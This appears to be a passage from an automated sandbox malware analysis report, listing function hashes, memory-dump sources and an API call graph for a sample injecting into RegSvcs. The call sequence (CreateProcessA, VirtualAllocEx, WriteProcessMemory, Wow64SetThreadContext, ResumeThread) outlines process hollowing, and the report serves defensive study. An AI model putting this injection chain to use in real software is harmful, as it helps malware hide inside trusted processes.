                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 505c474d34bbf8a91916fa07147c9d33d27960e7ad231018b51bd7fd1434f286
                            • Instruction ID: 55ab7a941ac370462f1953559c0f58472a3fb2e59fa52b93d2471c497ddb2897
                            • Opcode Fuzzy Hash: 505c474d34bbf8a91916fa07147c9d33d27960e7ad231018b51bd7fd1434f286
                            • Instruction Fuzzy Hash: C321897AF01346DFDF11ABB4580456E7BB1EB8A364F1949A6E609C7390EB34C802C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF4F98 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72053be1577235ade844bb55151c7b5c313b5dd6cd9ecc8f3769d4f0851f6fd0
                            • Instruction ID: b3f1402c0c5c55d089589af16c0ab2fc7a7acd6db3b8b88d4900fadfd3bd6b68
                            • Opcode Fuzzy Hash: 72053be1577235ade844bb55151c7b5c313b5dd6cd9ecc8f3769d4f0851f6fd0
                            • Instruction Fuzzy Hash: EB211934600609CFCB14EB78D959AAE7BF1AF89301B214568E606EB3A4DF319D01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1488 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5b40301daad41b2661d80ab5d71ba3b76a4cd5ac46524073e2141fa04eff310
                            • Instruction ID: 31cb5368586d02ba5b12298a78249eb6d756bc68aaa353b856610676257c4a4b
                            • Opcode Fuzzy Hash: b5b40301daad41b2661d80ab5d71ba3b76a4cd5ac46524073e2141fa04eff310
                            • Instruction Fuzzy Hash: 6711D675A01259CFCF21DBB894412BD7BF4EF85314F2A80BAE905E7302E635D9418BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF0848 Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56856024d0fa7b203fb5cc5facb20416d03421b140bc96100682abbe32174fa2
                            • Instruction ID: 755551bc28d7d0a673be45be7cd577b9b6e2bbd921c2d03d2d6d4610af180a1d
                            • Opcode Fuzzy Hash: 56856024d0fa7b203fb5cc5facb20416d03421b140bc96100682abbe32174fa2
                            • Instruction Fuzzy Hash: 9A11B230B002089FEF547A79D40073A3B95EB45390F198979D606CB396EA64CC818BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF0838 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dedd73cf0a87f6b8b2b038714781351c935e98fb8cedf0d63c25761e7c4d6722
                            • Instruction ID: 065b4ea7036fb2faf292a52c5cb38b29d200906ff54ce3144e1a420c01612382
                            • Opcode Fuzzy Hash: dedd73cf0a87f6b8b2b038714781351c935e98fb8cedf0d63c25761e7c4d6722
                            • Instruction Fuzzy Hash: 8E11C430B003489FEF256A75940033A7F55DB46394F1AC97AD646CB293EA64CC418BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1498 Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f4e5a00330de589ac75d001d38fee749ecee7cc921307d4f8d244305b96f615
                            • Instruction ID: 4eee2d0e4e6690ccc98c03e5e76c7d27a8ffb473b1b30df7773fe1c22805d92a
                            • Opcode Fuzzy Hash: 5f4e5a00330de589ac75d001d38fee749ecee7cc921307d4f8d244305b96f615
                            • Instruction Fuzzy Hash: 1E012175A01219DFCF25EFB884511BD7BF5EF88310B268479EA05E7302E635D9418BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9898 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d72182d7f5a50f16713544a759bc1741c60636944d0297108b6a352a6e3d9595
                            • Instruction ID: 63e6e8061402e07dcbf3b0a1b9fda5adc3b7107f14e7d887c5dec4ffd3dafaf9
                            • Opcode Fuzzy Hash: d72182d7f5a50f16713544a759bc1741c60636944d0297108b6a352a6e3d9595
                            • Instruction Fuzzy Hash: 0301B930A001048BCB04EF55D98479ABBB5FF84310F55C174D9485B29ADBB0ED45CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF40FF Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 366fc40e1ed0d6705b9b098738e9ff8315a371ce5a64e7a1a9b332658b2ec73a
                            • Instruction ID: 561c950657ea75bdee34ab1a963657b29f98314747bec860193358883f4b805f
                            • Opcode Fuzzy Hash: 366fc40e1ed0d6705b9b098738e9ff8315a371ce5a64e7a1a9b332658b2ec73a
                            • Instruction Fuzzy Hash: 3411F730D0030DDFCF34DA94D98A7FEB771AF61319F1A9029D115A2192AB3049C9CB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF80F0 Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed4ec9199ec736161faf234146f8314ef3ad2986e36dfad519bc3e1692b66f18
                            • Instruction ID: a7ac0375896e847fb587db0d3d8c924f9c3c99c5e9cf772ad11025b61380559f
                            • Opcode Fuzzy Hash: ed4ec9199ec736161faf234146f8314ef3ad2986e36dfad519bc3e1692b66f18
                            • Instruction Fuzzy Hash: E3012C3494010A9FCB06FFB8F995A9C7BB5EF40304F5145F9C0089B266EB71AE09CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF7090 Relevance: .0, Instructions: 34COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 747434d14cc8afde4fbf341f30f3ad8ac93135c19f9123768093f2ff873cd8dc
                            • Instruction ID: 168cf9f5b245a2677a4dc0f2a91905bdf7abf0dcef1f34cb3a84b3e24148222d
                            • Opcode Fuzzy Hash: 747434d14cc8afde4fbf341f30f3ad8ac93135c19f9123768093f2ff873cd8dc
                            • Instruction Fuzzy Hash: CBF01439B402088FC714EB64D498AAC73B2EF89325F1444A8E50ACB3A0CB31AD42CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF8100 Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c895ecbf7d92b8d46cdd1e8f3e2a78382612d8d947fe0866ade0c56d082b7a48
                            • Instruction ID: e809c687ce353d753101d74b9fc39cab8faec91386b8d0a6eef704d5c6961b3e
                            • Opcode Fuzzy Hash: c895ecbf7d92b8d46cdd1e8f3e2a78382612d8d947fe0866ade0c56d082b7a48
                            • Instruction Fuzzy Hash: 9AF0193494010A9FCB45FFB8F98199D7BB9EF80304F5046B9C0089B269EB71AE09CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:11%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:376
                            Total number of Limit Nodes:29
                            execution_graph 40360 154da10 DuplicateHandle 40361 154daa6 40360->40361 40362 154d3c0 40363 154d406 GetCurrentProcess 40362->40363 40365 154d451 40363->40365 40366 154d458 GetCurrentThread 40363->40366 40365->40366 40367 154d495 GetCurrentProcess 40366->40367 40368 154d48e 40366->40368 40369 154d4cb 40367->40369 40368->40367 40370 154d4f3 GetCurrentThreadId 40369->40370 40371 154d524 40370->40371 40401 154b030 40404 154b117 40401->40404 40402 154b03f 40405 154b139 40404->40405 40406 154b15c 40404->40406 40405->40406 40412 154b3c0 40405->40412 40416 154b3b1 40405->40416 40406->40402 40407 154b360 GetModuleHandleW 40409 154b38d 40407->40409 40408 154b154 40408->40406 40408->40407 40409->40402 40413 154b3d4 40412->40413 40414 154b3f9 40413->40414 40420 154a4b0 40413->40420 40414->40408 40417 154b3ba 40416->40417 40418 154b3f9 40417->40418 40419 154a4b0 LoadLibraryExW 40417->40419 40418->40408 40419->40418 40421 154b5a0 LoadLibraryExW 40420->40421 40423 154b619 40421->40423 40423->40414 40424 788dfb0 40425 788dfb6 40424->40425 40430 788f6c0 40425->40430 40453 788f726 40425->40453 40477 788f6b1 40425->40477 40426 788dfc1 40431 788f6da 40430->40431 40433 788f6e2 40431->40433 40500 eff06eb 40431->40500 40505 eff04cb 40431->40505 40510 eff03cb 40431->40510 40515 eff082d 40431->40515 40519 eff086e 40431->40519 40524 eff00f0 40431->40524 40529 eff04f0 40431->40529 40534 eff0ad3 40431->40534 40538 eff0254 40431->40538 40543 eff07d4 40431->40543 40548 eff0437 40431->40548 40553 eff0279 40431->40553 40558 eff04b9 40431->40558 40563 eff02bb 40431->40563 40568 eff045b 40431->40568 40573 eff063e 40431->40573 40578 eff0663 40431->40578 40583 eff09c4 40431->40583 40588 eff0324 40431->40588 40593 eff0129 40431->40593 40433->40426 40454 788f729 40453->40454 40455 788f6b4 40453->40455 40454->40426 40456 eff063e 2 API calls 40455->40456 40457 788f6e2 40455->40457 40458 eff045b 2 API calls 40455->40458 40459 eff02bb 2 API calls 40455->40459 40460 eff04b9 2 API calls 40455->40460 40461 eff0279 2 API calls 40455->40461 40462 eff0437 2 API calls 40455->40462 40463 eff07d4 2 API calls 40455->40463 40464 eff0254 2 API calls 40455->40464 40465 eff0ad3 2 API calls 40455->40465 40466 eff04f0 2 API calls 40455->40466 40467 eff00f0 2 API calls 40455->40467 40468 eff086e 2 API calls 40455->40468 40469 eff082d 2 API calls 40455->40469 40470 eff03cb 2 API calls 40455->40470 40471 eff04cb 2 API calls 40455->40471 40472 eff06eb 2 API calls 40455->40472 40473 eff0129 2 API calls 40455->40473 40474 eff0324 2 API calls 40455->40474 40475 eff09c4 2 API calls 40455->40475 40476 eff0663 2 API calls 40455->40476 40456->40457 40457->40426 40458->40457 40459->40457 40460->40457 40461->40457 40462->40457 40463->40457 40464->40457 40465->40457 40466->40457 40467->40457 40468->40457 40469->40457 40470->40457 40471->40457 40472->40457 40473->40457 40474->40457 40475->40457 40476->40457 40478 788f6da 40477->40478 40479 788f6e2 40478->40479 40480 eff063e 2 API calls 40478->40480 40481 eff045b 2 API calls 40478->40481 40482 eff02bb 2 API calls 40478->40482 40483 eff04b9 2 API calls 40478->40483 40484 eff0279 2 API calls 40478->40484 40485 eff0437 2 API calls 40478->40485 40486 eff07d4 2 API calls 40478->40486 40487 eff0254 2 API calls 40478->40487 40488 eff0ad3 2 API calls 40478->40488 40489 eff04f0 2 API calls 40478->40489 40490 eff00f0 2 API calls 40478->40490 40491 eff086e 2 API calls 40478->40491 40492 eff082d 2 API calls 40478->40492 40493 eff03cb 2 API calls 40478->40493 40494 eff04cb 2 API calls 40478->40494 40495 eff06eb 2 API calls 40478->40495 40496 eff0129 2 API calls 40478->40496 40497 eff0324 2 API calls 40478->40497 40498 eff09c4 2 API calls 40478->40498 40499 eff0663 2 API calls 40478->40499 40479->40426 40480->40479 40481->40479 40482->40479 40483->40479 40484->40479 40485->40479 40486->40479 40487->40479 40488->40479 40489->40479 40490->40479 40491->40479 40492->40479 40493->40479 40494->40479 40495->40479 40496->40479 40497->40479 40498->40479 40499->40479 40501 eff0260 40500->40501 40502 eff0bde 40501->40502 40598 788d178 40501->40598 40602 788d180 40501->40602 40506 eff0507 40505->40506 40507 eff0528 40506->40507 40606 788d238 40506->40606 40610 788d240 40506->40610 40511 eff03d8 40510->40511 40614 788cbb8 40511->40614 40618 788cbc0 40511->40618 40512 eff0a58 40622 788d768 40515->40622 40626 788d762 40515->40626 40516 eff084f 40520 eff0260 40519->40520 40521 eff089f 40520->40521 40522 788d178 VirtualAllocEx 40520->40522 40523 788d180 VirtualAllocEx 40520->40523 40522->40520 40523->40520 40525 eff010f 40524->40525 40630 788d8f4 40525->40630 40634 788d900 40525->40634 40530 eff04f6 40529->40530 40532 788d238 WriteProcessMemory 40530->40532 40533 788d240 WriteProcessMemory 40530->40533 40531 eff0528 40532->40531 40533->40531 40638 eff0ef8 40534->40638 40643 eff0ee8 40534->40643 40535 eff0aeb 40539 eff0260 40538->40539 40540 eff0c11 40539->40540 40541 788d178 VirtualAllocEx 40539->40541 40542 788d180 VirtualAllocEx 40539->40542 40541->40539 40542->40539 40544 eff0260 40543->40544 40545 eff0c11 40544->40545 40546 788d178 VirtualAllocEx 40544->40546 40547 788d180 VirtualAllocEx 40544->40547 40546->40544 40547->40544 40549 eff0323 40548->40549 40551 788cbb8 ResumeThread 40549->40551 40552 788cbc0 ResumeThread 40549->40552 40550 eff0a58 40551->40550 40552->40550 40556 788cc68 Wow64SetThreadContext 40553->40556 40557 788cc70 Wow64SetThreadContext 40553->40557 40554 eff0278 40554->40553 40555 eff08ed 40554->40555 40555->40433 40556->40554 40557->40554 40559 eff08f3 40558->40559 40561 788d238 WriteProcessMemory 40559->40561 40562 788d240 WriteProcessMemory 40559->40562 40560 eff0a0d 40561->40560 40562->40560 40564 eff0278 40563->40564 40565 eff08ed 40564->40565 40566 788cc68 Wow64SetThreadContext 40564->40566 40567 788cc70 Wow64SetThreadContext 40564->40567 40565->40433 40566->40564 40567->40564 40569 eff0260 40568->40569 40570 eff0c11 40569->40570 40571 788d178 VirtualAllocEx 40569->40571 40572 788d180 VirtualAllocEx 40569->40572 40570->40570 40571->40569 40572->40569 40574 eff0606 40573->40574 40576 788cbb8 ResumeThread 40574->40576 40577 788cbc0 ResumeThread 40574->40577 40575 eff0a58 40576->40575 40577->40575 40579 eff066c 40578->40579 40581 788d238 WriteProcessMemory 40579->40581 40582 788d240 WriteProcessMemory 40579->40582 40580 eff0785 40581->40580 40582->40580 40584 eff0278 40583->40584 40584->40583 40585 eff08ed 40584->40585 40586 788cc68 Wow64SetThreadContext 40584->40586 40587 788cc70 Wow64SetThreadContext 40584->40587 40585->40433 40586->40584 40587->40584 40589 eff033e 40588->40589 40591 788cbb8 ResumeThread 40589->40591 40592 788cbc0 ResumeThread 40589->40592 40590 eff0a58 40591->40590 40592->40590 40594 eff0110 40593->40594 40596 788d900 CreateProcessA 40594->40596 40597 788d8f4 CreateProcessA 40594->40597 40595 eff0235 40595->40433 40596->40595 40597->40595 40599 788d180 VirtualAllocEx 40598->40599 40601 788d1fd 40599->40601 40601->40501 40603 788d1c0 VirtualAllocEx 40602->40603 40605 788d1fd 40603->40605 40605->40501 40607 788d288 WriteProcessMemory 40606->40607 40609 788d2df 40607->40609 40609->40507 40611 788d288 WriteProcessMemory 40610->40611 40613 788d2df 40611->40613 40613->40507 40615 788cc00 ResumeThread 40614->40615 40617 788cc31 40615->40617 40617->40512 40619 788cc00 ResumeThread 40618->40619 40621 788cc31 40619->40621 40621->40512 40623 788d7b3 ReadProcessMemory 40622->40623 40625 788d7f7 40623->40625 40625->40516 40627 788d7b3 ReadProcessMemory 40626->40627 40629 788d7f7 40627->40629 40629->40516 40631 788d900 CreateProcessA 40630->40631 40633 788db4b 40631->40633 40633->40633 40635 788d989 CreateProcessA 40634->40635 40637 788db4b 40635->40637 40639 eff0f0d 40638->40639 40648 788cc68 40639->40648 40652 788cc70 40639->40652 40640 eff0f23 40640->40535 40644 eff0ef8 40643->40644 40646 788cc68 Wow64SetThreadContext 40644->40646 40647 788cc70 Wow64SetThreadContext 40644->40647 40645 eff0f23 40645->40535 40646->40645 40647->40645 40649 788ccb5 Wow64SetThreadContext 40648->40649 40651 788ccfd 40649->40651 40651->40640 40653 788ccb5 Wow64SetThreadContext 40652->40653 40655 788ccfd 40653->40655 40655->40640 40372 1544808 40373 1544811 40372->40373 40374 1544817 40373->40374 40377 1544d40 40373->40377 40383 1544d09 40373->40383 40378 1544ca9 40377->40378 40380 1544d4b 40377->40380 40388 1544e07 40378->40388 40393 1544e18 40378->40393 40380->40374 40384 1544d2d 40383->40384 40386 1544e07 CreateActCtxA 40384->40386 40387 1544e18 CreateActCtxA 40384->40387 40385 1544d37 40385->40374 40386->40385 40387->40385 40390 1544d37 40388->40390 40391 1544e0b 40388->40391 40389 1544f1c 40389->40389 40390->40374 40391->40389 40397 15449f0 40391->40397 40395 1544e3f 40393->40395 40394 1544f1c 40394->40394 40395->40394 40396 15449f0 CreateActCtxA 40395->40396 40396->40394 40398 1545ea8 CreateActCtxA 40397->40398 40400 1545f6b 40398->40400 40656 5842a38 40657 5842a39 40656->40657 40660 58411e4 40657->40660 40659 5842a54 40664 58411ef 40660->40664 40661 5842f05 40661->40659 40663 5841214 DrawTextExW 40663->40664 40664->40661 40664->40663 40674 5843020 40664->40674 40678 5842f63 40664->40678 40682 5842ff0 40664->40682 40686 5843a90 40664->40686 40690 5843ac0 40664->40690 40694 5845cf0 40664->40694 40698 5845ce0 40664->40698 40702 5848338 40664->40702 40712 5848328 40664->40712 40721 5841234 40664->40721 40675 5843021 40674->40675 40676 5843056 40675->40676 40727 5841244 40675->40727 40676->40664 40679 5842f80 40678->40679 40680 5842fa6 40679->40680 40681 5841244 DrawTextExW 40679->40681 40680->40664 40681->40680 40684 5842f9e 40682->40684 40683 5842fa6 40683->40664 40684->40683 40685 5841244 DrawTextExW 40684->40685 40685->40683 40687 5843a94 40686->40687 40688 5841234 DrawTextExW 40687->40688 40689 5843ad6 40688->40689 40689->40664 40691 5843ac1 40690->40691 40692 5841234 DrawTextExW 40691->40692 40693 5843ad6 40692->40693 40693->40664 40695 5845cf1 40694->40695 40696 5841234 DrawTextExW 40695->40696 40697 5845d07 40696->40697 40697->40664 40699 5845cec 40698->40699 40700 5841234 DrawTextExW 40699->40700 40701 5845d07 40700->40701 40701->40664 40703 5848363 40702->40703 40704 584835c 40702->40704 40709 58483b6 40703->40709 40793 5844b54 40703->40793 40704->40664 40707 5844b54 GetCurrentThreadId 40708 584838a 40707->40708 40708->40709 40797 5848837 40708->40797 40802 5848848 40708->40802 40709->40664 40713 5848338 40712->40713 40714 5844b54 GetCurrentThreadId 40713->40714 40718 584835c 40713->40718 40715 5848380 40714->40715 40716 5844b54 GetCurrentThreadId 40715->40716 40717 584838a 40716->40717 40717->40718 40719 5848837 DrawTextExW 40717->40719 40720 5848848 DrawTextExW 40717->40720 40718->40664 40719->40718 40720->40718 40722 584123f 40721->40722 40723 5843b90 40722->40723 40815 5843bb0 40722->40815 40819 5843ba3 40722->40819 40723->40664 40724 5843b5a 40724->40664 40728 584124f 40727->40728 40729 58432ab 40728->40729 40730 584330c 40728->40730 40735 5841318 40728->40735 40729->40676 40733 5845ce0 DrawTextExW 40730->40733 40734 5845cf0 DrawTextExW 40730->40734 40732 5843339 40733->40732 40734->40732 40736 5841323 40735->40736 40740 5849308 40736->40740 40744 5849318 40736->40744 40737 58492ff 40737->40730 40741 584931e 40740->40741 40748 5849352 40741->40748 40742 5849346 40742->40737 40745 5849321 40744->40745 40747 5849352 DrawTextExW 40745->40747 40746 5849346 40746->40737 40747->40746 40749 584938a 40748->40749 40750 584939b 40748->40750 40749->40742 40751 5849429 40750->40751 40754 5849a90 40750->40754 40759 5849a82 40750->40759 40751->40742 40755 5849ab8 40754->40755 40756 5849bbe 40755->40756 40764 584a228 40755->40764 40769 584a238 40755->40769 40756->40749 40760 5849ab8 40759->40760 40761 5849bbe 40760->40761 40762 584a228 DrawTextExW 40760->40762 40763 584a238 DrawTextExW 40760->40763 40761->40749 40762->40761 40763->40761 40765 584a238 40764->40765 40774 584a6a0 40765->40774 40778 584a690 40765->40778 40766 584a2c4 40766->40756 40770 584a24e 40769->40770 40772 584a690 DrawTextExW 40770->40772 40773 584a6a0 DrawTextExW 40770->40773 40771 584a2c4 40771->40756 40772->40771 40773->40771 40783 584aad8 40774->40783 40788 584aae8 40774->40788 40775 584a6be 40775->40766 40779 584a6a0 40778->40779 40781 584aad8 DrawTextExW 40779->40781 40782 584aae8 DrawTextExW 40779->40782 40780 584a6be 40780->40766 40781->40780 40782->40780 40785 584aae8 40783->40785 40784 584ab46 40784->40775 40785->40784 40786 584ab58 DrawTextExW 40785->40786 40787 584ab68 DrawTextExW 40785->40787 40786->40784 40787->40784 40789 584ab19 40788->40789 40790 584ab46 40789->40790 40791 584ab58 DrawTextExW 40789->40791 40792 584ab68 DrawTextExW 40789->40792 40790->40775 40791->40790 40792->40790 40794 5844b59 40793->40794 40795 584869f GetCurrentThreadId 40794->40795 40796 5848380 40794->40796 40795->40796 40796->40707 40798 5848848 40797->40798 40799 58488eb 40798->40799 40807 5849250 40798->40807 40811 5849260 40798->40811 40799->40709 40804 5848869 40802->40804 40803 58488eb 40803->40709 40804->40803 40805 5849250 DrawTextExW 40804->40805 40806 5849260 DrawTextExW 40804->40806 40805->40803 40806->40803 40808 5849260 40807->40808 40809 5849282 40808->40809 40810 5841244 DrawTextExW 40808->40810 40809->40799 40810->40809 40812 584926d 40811->40812 40813 5849282 40812->40813 40814 5841244 DrawTextExW 40812->40814 40813->40799 40814->40813 40816 5843bd0 40815->40816 40817 5841318 DrawTextExW 40816->40817 40818 5843c0a 40816->40818 40817->40818 40818->40724 40820 5843bd0 40819->40820 40821 5841318 DrawTextExW 40820->40821 40822 5843c0a 40820->40822 40821->40822 40822->40724 40823 eff0f80 40824 eff110b 40823->40824 40825 eff0fa6 40823->40825 40825->40824 40828 eff1608 PostMessageW 40825->40828 40830 eff1601 40825->40830 40829 eff1674 40828->40829 40829->40825 40831 eff1608 PostMessageW 40830->40831 40832 eff1674 40831->40832 40832->40825

                            Executed Functions

                            Function 0154D3B0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 536 154d3b0-154d44f GetCurrentProcess 540 154d451-154d457 536->540 541 154d458-154d48c GetCurrentThread 536->541 540->541 542 154d495-154d4c9 GetCurrentProcess 541->542 543 154d48e-154d494 541->543 545 154d4d2-154d4ed call 154d998 542->545 546 154d4cb-154d4d1 542->546 543->542 548 154d4f3-154d522 GetCurrentThreadId 545->548 546->545 550 154d524-154d52a 548->550 551 154d52b-154d58d 548->551 550->551
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0154D43E
                            • GetCurrentThread.KERNEL32 ref: 0154D47B
                            • GetCurrentProcess.KERNEL32 ref: 0154D4B8
                            • GetCurrentThreadId.KERNEL32 ref: 0154D511
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: ac1455f95419911152ab0fb0c5246929803df2f41d48175f1ae2fa301a10b93a
                            • Instruction ID: def61946c5c22933367d636c9d8159bde211224b9dfbdd95f68047fd62c7b0c1
                            • Opcode Fuzzy Hash: ac1455f95419911152ab0fb0c5246929803df2f41d48175f1ae2fa301a10b93a
                            • Instruction Fuzzy Hash: EE5159B09003498FDB18DFA9D548BEEBFF1FF48314F208459E049AB2A1D7785984CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0154D3C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 558 154d3c0-154d44f GetCurrentProcess 562 154d451-154d457 558->562 563 154d458-154d48c GetCurrentThread 558->563 562->563 564 154d495-154d4c9 GetCurrentProcess 563->564 565 154d48e-154d494 563->565 567 154d4d2-154d4ed call 154d998 564->567 568 154d4cb-154d4d1 564->568 565->564 570 154d4f3-154d522 GetCurrentThreadId 567->570 568->567 572 154d524-154d52a 570->572 573 154d52b-154d58d 570->573 572->573
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0154D43E
                            • GetCurrentThread.KERNEL32 ref: 0154D47B
                            • GetCurrentProcess.KERNEL32 ref: 0154D4B8
                            • GetCurrentThreadId.KERNEL32 ref: 0154D511
                            Memory Dump Source
                            • Source File: 00000008.00000002.2133285293.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_1540000_WAuLmtFUmD.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: a163dd464758809d7a2c346d4a02ef8319801c3d2277bc2ce281ecaf1ea2b265
                            • Instruction ID: 1abf530b2cc4c8642edab062635e80be3c61f71530ed19dd009a472f7dbc5ec6
                            • Opcode Fuzzy Hash: a163dd464758809d7a2c346d4a02ef8319801c3d2277bc2ce281ecaf1ea2b265
                            • Instruction Fuzzy Hash: 495158B09003498FDB18DFAAD548BEEBBF5FF48314F208459E049A7360D7786984CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0788D8F4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 862 788d8f4-788d995 865 788d9ce-788d9ee 862->865 866 788d997-788d9a1 862->866 871 788d9f0-788d9fa 865->871 872 788da27-788da56 865->872 866->865 867 788d9a3-788d9a5 866->867 869 788d9c8-788d9cb 867->869 870 788d9a7-788d9b1 867->870 869->865 873 788d9b3 870->873 874 788d9b5-788d9c4 870->874 871->872 876 788d9fc-788d9fe 871->876 880 788da58-788da62 872->880 881 788da8f-788db49 CreateProcessA 872->881 873->874 874->874 875 788d9c6 874->875 875->869 877 788da00-788da0a 876->877 878 788da21-788da24 876->878 882 788da0c 877->882 883 788da0e-788da1d 877->883 878->872 880->881 884 788da64-788da66 880->884 894 788db4b-788db51 881->894 895 788db52-788dbd8 881->895 882->883 883->883 885 788da1f 883->885 886 788da68-788da72 884->886 887 788da89-788da8c 884->887 885->878 889 788da74 886->889 890 788da76-788da85 886->890 887->881 889->890 890->890 891 788da87 890->891 891->887 894->895 905 788dbe8-788dbec 895->905 906 788dbda-788dbde 895->906 907 788dbfc-788dc00 905->907 908 788dbee-788dbf2 905->908 906->905 909 788dbe0 906->909 911 788dc10-788dc14 907->911 912 788dc02-788dc06 907->912 908->907 910 788dbf4 908->910 909->905 910->907 914 788dc26-788dc2d 911->914 915 788dc16-788dc1c 911->915 912->911 913 788dc08 912->913 913->911 916 788dc2f-788dc3e 914->916 917 788dc44 914->917 915->914 916->917 918 788dc45 917->918 918->918
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0788DB36
                            Memory Dump Source
